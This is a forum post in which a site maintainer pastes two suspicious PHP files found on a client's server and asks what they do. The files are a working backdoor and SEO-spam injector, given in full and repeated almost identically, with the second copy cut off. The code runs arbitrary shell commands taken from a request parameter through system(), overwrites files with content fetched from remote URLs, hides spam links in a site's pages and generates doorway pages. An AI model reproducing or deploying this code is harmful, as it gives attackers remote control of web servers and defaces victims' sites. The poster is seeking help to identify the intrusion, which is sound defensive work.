Andrea Posted May 12, 2010
I was just looking at a client's site and noticed two very strange folders that I have nothing to do with. One is called bpbhl and contains only one file - qxn.php which has this in it: Sorry this is so long, but since I have no clue what might be essential and what not, I figure I better post everything. Can anyone tell what this might be about? I'm concerned.
<?php ignore_user_abort(1); set_time_limit(0); function Clear() { unlink("c"); unlink("1r.txt"); unlink("2r.txt"); unlink("log"); } function Clear2() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); $fin = ereg_replace("<!--dd4-->", "", $fin); $fin = ereg_replace("<!--dd5-->", "", $fin); $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); echo " upt-ok"; } function GetVar($name, &$var) { $var = ""; if (isset($_POST[$name])) $var = $_POST[$name]; if (isset($_GET[$name])) $var = $_GET[$name]; if (($var) =="") return false; else return true; } function GenNew() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; $path = ""; $fr = fopen("1r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); } else { $fconf = fopen("c", "w+"); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; mkdir($tname); fwrite($fconf, $tname); $pid = 0; $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if 
(!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fc = ""; $fp = fopen($gname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $arr = explode("</html>", $fin); //print_r($arr); $curs = trim($arr[1]); $newf = "$tname/$curs/"; echo "$newf"; mkdir($newf); $fnd = fopen("$tname/$curs/$curs".".php", "w+"); fwrite($fnd, $fin); fclose($fnd); fwrite($fr, "$tname/$curs/$curs".".php\n"); } } function Gen2() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); $md = false; if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_GET["md"])) $md = true; $path = ""; $fr = fopen("1r.txt", "a+"); $f2r = fopen("2r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $i_dor = trim($fconf[0]); $i_dor = $i_dor+0; } else { $fconf = fopen("c", "w+"); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } fwrite($fconf, "0\n"); $pid = 0; $fht = fopen(".htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $fht = fopen("2.js", "w+"); $htname = $sg."2js.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $f1t = fopen("1t", "w+"); $f1tname = $sg."1t.php"; $fp = fopen($f1tname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($f1t, $fin); fclose($f1t); $f1t = fopen("1g", "w+"); $f1tname = $sg."1g.php"; $fp = fopen($f1tname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($f1t, $fin); fclose($f1t); } $i_dor++; $i_dor--; $a1t = file("1t"); $a1g = 
file("1g"); $ar1 = array("<li>","<p>","<br>"); $ar2 = array("</li>","</p>","<br>"); $gname = $sg."sgen2.php"; for ($j=$pid; $j<$pid+10; $j++) { $rndo = mt_rand(0,count($ar1)-1); $ob1 = $ar1[$rndo]; $ob2 = $ar2[$rndo]; $cth = trim($a1t[$i_dor]); $tmp1 = explode("||", $cth); $cth = $tmp1[1]; $curname = $tmp1[0]; $i_dor++; $fc = ""; $fp = fopen($gname."?th=$cth", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); preg_match_all( '|<title>(.*)</title>|sUS', $fin, $mtitle ); $mtitle = trim($mtitle[0][0]); $mtitle = strip_tags($mtitle); $keyr1 = ereg_replace(" ", "+", $mtitle); $keyr1 = ereg_replace("\n","", $keyr1); //echo "keyr=$keyr1"; $fp = fopen("http://www.altavista.com/web/results?q=$keyr1&nbq=100", "r"); $yahp = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $yahp .= $fc; } fclose($fp); preg_match_all( '|<a class=\'res\'(.*)</a>|sUS', $yahp, $titles ); $titles = $titles[0]; for ($i=0; $i<count($titles); $i++) { $titles[$i] = strip_tags($titles[$i]); } preg_match_all( '|<span class=s>(.*)</span>|sUS', $yahp, $decs ); $decs = $decs[1]; for ($i=0; $i<count($decs); $i++) { $decs[$i] = strip_tags($decs[$i]); } for ($i=3; $i<count($titles); $i++) { $fin = ereg_replace("<KEYT$i>", $titles[$i], $fin); } for ($i=0; $i<count($decs); $i++) { $fin = ereg_replace("<KEYD$i>", $decs[$i], $fin); } for ($i=0; $i<100; $i++) { $fin = ereg_replace("<KEYD$i>", "", $fin); $fin = ereg_replace("<KEYT$i>", "", $fin); } $links =""; if (($i_dor<192) || ($i_dor>199)) { $rlink1 = mt_rand(1,4); while (true) { $rlink2 = mt_rand(1,4); if ($rlink2!=$rlink1) { break; } } $srnd = mt_rand(3,8); $links1 = ""; for ($y=0; $y<$srnd; $y++) { $rndi = mt_rand(0,299); $rth = trim($a1t[$rndi]); $links1 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n"; $rnd = mt_rand(1,5); if ($rnd==5) { $srndo = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srndo]); $exla = "http://".$exl; $links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } } $fin = 
ereg_replace("<LINKSD$rlink1>", $links1, $fin); $srnd = mt_rand(3,8); $links2 = ""; for ($y=0; $y<$srnd; $y++) { $rndi = mt_rand(0,299); $rth = trim($a1t[$rndi]); $links2 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n"; $rnd = mt_rand(1,7); if ($rnd==5) { $srndo = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srndo]); $exla = "http://".$exl; $links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } } $fin = ereg_replace("<LINKSD$rlink2>", $links2, $fin); } if ($i_dor==192) { $links1 = ""; $links2 = ""; $links3 = ""; $links4 = ""; for ($y=0; $y<80; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } $links1 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n"; } $fin = ereg_replace("<LINKSM1>", $links1, $fin); for ($y=80; $y<160; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } $links2 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n"; } $fin = ereg_replace("<LINKSM2>", $links2, $fin); for ($y=160; $y<240; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links3 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } $links3 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2\n"; } $fin = ereg_replace("<LINKSM3>", $links3, $fin); for ($y=240; $y<320; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links4 .= "$ob1 <a href='$exla'>$exl</a> 
$ob2 \n"; } $links4 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n"; } $fin = ereg_replace("<LINKSM4>", $links4, $fin); } $fin = ereg_replace("<LINKSD1>", "", $fin); $fin = ereg_replace("<LINKSD2>", "", $fin); $fin = ereg_replace("<LINKSD3>", "", $fin); $fin = ereg_replace("<LINKSD4>", "", $fin); $fin = ereg_replace("<LINKSM1>", "", $fin); $fin = ereg_replace("<LINKSM2>", "", $fin); $fin = ereg_replace("<LINKSM3>", "", $fin); $fin = ereg_replace("<LINKSM4>", "", $fin); $curs = $cth; $fnd = fopen("$curname".".php", "w+"); fwrite($fnd, $fin); fclose($fnd); if (($md) && ($i_dor==192 )) { fwrite($fr, "$curname".".php||$curs\n"); } if (($md) && ($i_dor!=192 ) ) { fwrite($f2r, "$curname".".php||$curs\n"); } } $fconf = fopen("c", "w+"); fwrite($fconf, $i_dor."\n"); fclose($fconf); } function Gen() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_POST["gm"])) $g = $_POST["gm"]; if (isset($_GET["gm"])) $g = $_GET["gm"]; $path = ""; $fr = fopen("1r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); $cname = trim($fconf[1]); $curs = trim($fconf[2]); $pid = trim($fconf[3]); if ($pid == 100) { $pid = 0; $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); $curs = $g; } } else { $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; $pid = 0; $curs = $g; mkdir($tname); $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); } $gname = 
$sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fp = fopen($gname."?g=$curs", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+"); fwrite($fnd, $fin); fclose($fnd); } if ($j==100) { $fp = fopen($gname."?g=$curs&m=1", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+"); fwrite($fnd, $fin); fclose($fnd); $map = "$path/$tname/$cname/$curs"."_lm.php"; fwrite($fr,"$map\n"); } $fconf = fopen("c", "w+"); fwrite($fconf, $tname."\n"); fwrite($fconf, $cname."\n"); fwrite($fconf, $curs."\n"); $nj = $j; fwrite($fconf, $nj."\n"); fclose($fconf); } function Update() { if (isset($_GET["name"])) $sname = $_GET["name"]; $thisname = "$sname.php"; if (isset($_POST['u'])) $u = $_POST['u']; if (isset($_GET['u'])) $u = $_GET['u']; $fp = fopen($u, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fthis = fopen($thisname, "w+"); fwrite($fthis, $fin); fclose($fthis); } function Com() { if (isset($_POST['c'])) @system($_POST['c']); if (isset($_GET['c'])) @system($_GET['c']); } function MRepl() { $mpt = ""; $drs = ""; $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; $endtag = "</font></body></html><dd5> "; $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); GetVar("mpt", $mpt); // ??????? ??????????? ???? ???? 
$fin = preg_replace ("/<\/body>/i", "", $fin); $fin = preg_replace ("/<\/html>/i", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fp = fopen($mpt, "r"); $drs = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) { exit(); } $drs .= $fc; } fclose($fp); $fin = $fin.$begtag; $fin = $fin.$drs; $fin = $fin.$endtag; $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function WrTest() { $path = trim($_GET['wr']); $htname = $path."w.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); ; $fout = fopen("w.txt", "w+"); fwrite($fout, $fin); fclose($fout); } function Main() { if (isset($_POST['u']) || isset($_GET['u'])) { Update(); exit(); } if (isset($_POST['c']) || isset($_GET['c'])) { Com(); exit(); } if (isset($_POST['g']) || isset($_GET['g'])) { Gen(); exit(); } if (isset($_POST['g1']) || isset($_GET['g1'])) { GenNew(); exit(); } if (isset($_POST['g2']) || isset($_GET['g2'])) { Gen2(); exit(); } if (isset($_POST['s']) || isset($_GET['s'])) { MRepl(); exit(); } if (isset($_POST['cl']) || isset($_GET['cl'])) { Clear(); exit(); } if (isset($_POST['cl2']) || isset($_GET['cl2'])) { Clear2(); exit(); } if (isset($_POST['wr']) || isset($_GET['wr'])) { WrTest(); exit(); } echo "<ok>"; } Main(); ?> The other folder is called euhdy and contains error_log, tur.php, and w.txt (is empty). 
tur.php contains <?php ignore_user_abort(1); set_time_limit(0); function Clear() { unlink("c"); unlink("1r.txt"); unlink("2r.txt"); unlink("log"); } function Clear2() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); $fin = ereg_replace("<!--dd4-->", "", $fin); $fin = ereg_replace("<!--dd5-->", "", $fin); $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); echo " upt-ok"; } function GetVar($name, &$var) { $var = ""; if (isset($_POST[$name])) $var = $_POST[$name]; if (isset($_GET[$name])) $var = $_GET[$name]; if (($var) =="") return false; else return true; } function GenNew() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; $path = ""; $fr = fopen("1r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); } else { $fconf = fopen("c", "w+"); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; mkdir($tname); fwrite($fconf, $tname); $pid = 0; $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fc = ""; $fp = fopen($gname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $arr = explode("</html>", $fin); //print_r($arr); $curs = trim($arr[1]); $newf = "$tname/$curs/"; echo "$newf"; mkdir($newf); $fnd = 
fopen("$tname/$curs/$curs".".php", "w+"); fwrite($fnd, $fin); fclose($fnd); fwrite($fr, "$tname/$curs/$curs".".php\n"); } } function Gen2() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); $md = false; if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_GET["md"])) $md = true; $path = ""; $fr = fopen("1r.txt", "a+"); $f2r = fopen("2r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $i_dor = trim($fconf[0]); $i_dor = $i_dor+0; } else { $fconf = fopen("c", "w+"); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } fwrite($fconf, "0\n"); $pid = 0; $fht = fopen(".htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $fht = fopen("2.js", "w+"); $htname = $sg."2js.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $f1t = fopen("1t", "w+"); $f1tname = $sg."1t.php"; $fp = fopen($f1tname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($f1t, $fin); fclose($f1t); $f1t = fopen("1g", "w+"); $f1tname = $sg."1g.php"; $fp = fopen($f1tname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($f1t, $fin); fclose($f1t); } $i_dor++; $i_dor--; $a1t = file("1t"); $a1g = file("1g"); $ar1 = array("<li>","<p>","<br>"); $ar2 = array("</li>","</p>","<br>"); $gname = $sg."sgen2.php"; for ($j=$pid; $j<$pid+10; $j++) { $rndo = mt_rand(0,count($ar1)-1); $ob1 = $ar1[$rndo]; $ob2 = $ar2[$rndo]; $cth = trim($a1t[$i_dor]); $tmp1 = explode("||", $cth); $cth = $tmp1[1]; $curname = $tmp1[0]; $i_dor++; $fc = ""; $fp = fopen($gname."?th=$cth", "r"); $fin = ''; while (!feof($fp)) { $fc = 
fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); preg_match_all( '|<title>(.*)</title>|sUS', $fin, $mtitle ); $mtitle = trim($mtitle[0][0]); $mtitle = strip_tags($mtitle); $keyr1 = ereg_replace(" ", "+", $mtitle); $keyr1 = ereg_replace("\n","", $keyr1); //echo "keyr=$keyr1"; $fp = fopen("http://www.altavista.com/web/results?q=$keyr1&nbq=100", "r"); $yahp = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $yahp .= $fc; } fclose($fp); preg_match_all( '|<a class=\'res\'(.*)</a>|sUS', $yahp, $titles ); $titles = $titles[0]; for ($i=0; $i<count($titles); $i++) { $titles[$i] = strip_tags($titles[$i]); } preg_match_all( '|<span class=s>(.*)</span>|sUS', $yahp, $decs ); $decs = $decs[1]; for ($i=0; $i<count($decs); $i++) { $decs[$i] = strip_tags($decs[$i]); } for ($i=3; $i<count($titles); $i++) { $fin = ereg_replace("<KEYT$i>", $titles[$i], $fin); } for ($i=0; $i<count($decs); $i++) { $fin = ereg_replace("<KEYD$i>", $decs[$i], $fin); } for ($i=0; $i<100; $i++) { $fin = ereg_replace("<KEYD$i>", "", $fin); $fin = ereg_replace("<KEYT$i>", "", $fin); } $links =""; if (($i_dor<192) || ($i_dor>199)) { $rlink1 = mt_rand(1,4); while (true) { $rlink2 = mt_rand(1,4); if ($rlink2!=$rlink1) { break; } } $srnd = mt_rand(3,8); $links1 = ""; for ($y=0; $y<$srnd; $y++) { $rndi = mt_rand(0,299); $rth = trim($a1t[$rndi]); $links1 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n"; $rnd = mt_rand(1,5); if ($rnd==5) { $srndo = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srndo]); $exla = "http://".$exl; $links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } } $fin = ereg_replace("<LINKSD$rlink1>", $links1, $fin); $srnd = mt_rand(3,8); $links2 = ""; for ($y=0; $y<$srnd; $y++) { $rndi = mt_rand(0,299); $rth = trim($a1t[$rndi]); $links2 .= "$ob1 <a href='$rth.php'>$rth</a>$ob2 \n"; $rnd = mt_rand(1,7); if ($rnd==5) { $srndo = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srndo]); $exla = "http://".$exl; $links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } } $fin = 
ereg_replace("<LINKSD$rlink2>", $links2, $fin); } if ($i_dor==192) { $links1 = ""; $links2 = ""; $links3 = ""; $links4 = ""; for ($y=0; $y<80; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links1 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } $links1 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n"; } $fin = ereg_replace("<LINKSM1>", $links1, $fin); for ($y=80; $y<160; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links2 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } $links2 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n"; } $fin = ereg_replace("<LINKSM2>", $links2, $fin); for ($y=160; $y<240; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links3 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } $links3 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2\n"; } $fin = ereg_replace("<LINKSM3>", $links3, $fin); for ($y=240; $y<320; $y++) { $rth = trim($a1t[$y]); $tmp1 = explode("||", $rth); $rth = $tmp1[0]; $mname = $tmp1[1]; $rnd = mt_rand(1,5); if ($rnd==5) { $srnd = mt_rand(0,count($a1g)-1); $exl = trim($a1g[$srnd]); $exla = "http://".$exl; $links4 .= "$ob1 <a href='$exla'>$exl</a> $ob2 \n"; } $links4 .= "$ob1 <a href='$rth.php'>$mname</a> $ob2 \n"; } $fin = ereg_replace("<LINKSM4>", $links4, $fin); } $fin = ereg_replace("<LINKSD1>", "", $fin); $fin = ereg_replace("<LINKSD2>", "", $fin); $fin = ereg_replace("<LINKSD3>", "", $fin); $fin = ereg_replace("<LINKSD4>", "", $fin); $fin = ereg_replace("<LINKSM1>", "", $fin); $fin = ereg_replace("<LINKSM2>", "", $fin); $fin = 
ereg_replace("<LINKSM3>", "", $fin); $fin = ereg_replace("<LINKSM4>", "", $fin); $curs = $cth; $fnd = fopen("$curname".".php", "w+"); fwrite($fnd, $fin); fclose($fnd); if (($md) && ($i_dor==192 )) { fwrite($fr, "$curname".".php||$curs\n"); } if (($md) && ($i_dor!=192 ) ) { fwrite($f2r, "$curname".".php||$curs\n"); } } $fconf = fopen("c", "w+"); fwrite($fconf, $i_dor."\n"); fclose($fconf); } function Gen() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_POST["gm"])) $g = $_POST["gm"]; if (isset($_GET["gm"])) $g = $_GET["gm"]; $path = ""; $fr = fopen("1r.txt", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); $cname = trim($fconf[1]); $curs = trim($fconf[2]); $pid = trim($fconf[3]); if ($pid == 100) { $pid = 0; $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); $curs = $g; } } else { $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; $pid = 0; $curs = $g; mkdir($tname); $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fp = fopen($gname."?g=$curs", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+"); fwrite($fnd, $fin); fclose($fnd); } if ($j==100) { $fp = fopen($gname."?g=$curs&m=1", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) 
break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+"); fwrite($fnd, $fin); fclose($fnd); $map = "$path/$tname/$cname/$curs"."_lm.php"; fwrite($fr,"$map\n"); } $fconf = fopen("c", "w+"); fwrite($fconf, $tname."\n"); fwrite($fconf, $cname."\n"); fwrite($fconf, $curs."\n"); $nj = $j; fwrite($fconf, $nj."\n"); fclose($fconf); } function Update() { if (isset($_GET["name"])) $sname = $_GET["name"]; $thisname = "$sname.php"; if (isset($_POST['u'])) $u = $_POST['u']; if (isset($_GET['u'])) $u = $_GET['u']; $fp = fopen($u, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fthis = fopen($thisname, "w+"); fwrite($fthis, $fin); fclose($fthis); } function Com() { if (isset($_POST['c'])) @system($_POST['c']); if (isset($_GET['c'])) @system($_GET['c']); } function MRepl() { $mpt = ""; $drs = ""; $begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; $endtag = "</font></body></html><dd5> "; $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); GetVar("mpt", $mpt); // ??????? ??????????? ???? ???? 
$fin = preg_replace ("/<\/body>/i", "", $fin); $fin = preg_replace ("/<\/html>/i", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin); $fp = fopen($mpt, "r"); $drs = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) { exit(); } $drs .= $fc; } fclose($fp); $fin = $fin.$begtag; $fin = $fin.$drs; $fin = $fin.$endtag; $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function WrTest() { $path = trim($_GET['wr']); $htname = $path."w.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); ; $fout = fopen("w.txt", "w+"); fwrite($fout, $fin); fclose($fout); } function Main() { if (isset($_POST['u']) || isset($_GET['u'])) { Update(); exit(); } if (isset($_POST['c']) || isset($_GET['c'])) { Com(); exit(); } if (isset($_POST['g']) || isset($_GET['g'])) { Gen(); exit(); } if (isset($_POST['g1']) || isset($_GET['g1'])) { GenNew(); exit(); } if (isset($_POST['g2']) || isset($_GET['g2'])) { Gen2(); exit(); } if (isset($_POST['s']) || isset($_GET['s'])) { MRepl(); exit(); } if (isset($_POST['cl']) || isset($_GET['cl'])) { Clear(); exit(); } if (isset($_POST['cl2']) || isset($_GET['cl2'])) { Clear2(); exit(); } if (isset($_POST['wr']) || isset($_GET['wr'])) { WrTest(); exit(); } echo 